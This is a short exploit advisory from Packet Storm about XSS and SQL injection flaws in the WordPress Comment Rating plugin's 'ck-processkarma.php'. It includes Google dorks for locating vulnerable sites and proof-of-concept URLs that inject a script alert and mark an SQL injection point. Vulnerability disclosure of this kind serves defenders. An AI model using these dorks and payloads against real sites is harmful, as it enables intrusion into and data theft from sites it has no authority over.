The WordPress Comment Rating plugin suffers from cross site scripting and remote SQL injection vulnerabilities.
e15b510886040d312e2ee9a5b8c0e0d7ddd69a9314eca5a3a360aee7aadad935# Exploit Title: Wordpress comment rating plugin multiple Vulnerabilities
# Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/"
# 2- inurl:"/ck-processkarma.php?id="
# Date: 2/1/2012
# Author: The Evil Thinker
# Contact : Enstene156@hotmail.fr
# Software Link: www.wordpress.com
# Vulnerable plugin: Comment rating plugin
# Tested on: Linux
Details :
---------
the vulnerable file is "ck-processkarma.php"
the script doesn't filter the input parameters (id "sql", path "XSS")
Poc 1 (XSS) :
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=
Poc 2 (SQL injection) :
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=
-------------------------------------------------------------------------------------------
Special Graetz : Zack (DBA-HACKER) , Siper-N , Root-Mar , Anash , H!ch4m , Dr.Unknown , Mario-Gomez , BiiF0 , o Bla mantawel LLista
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed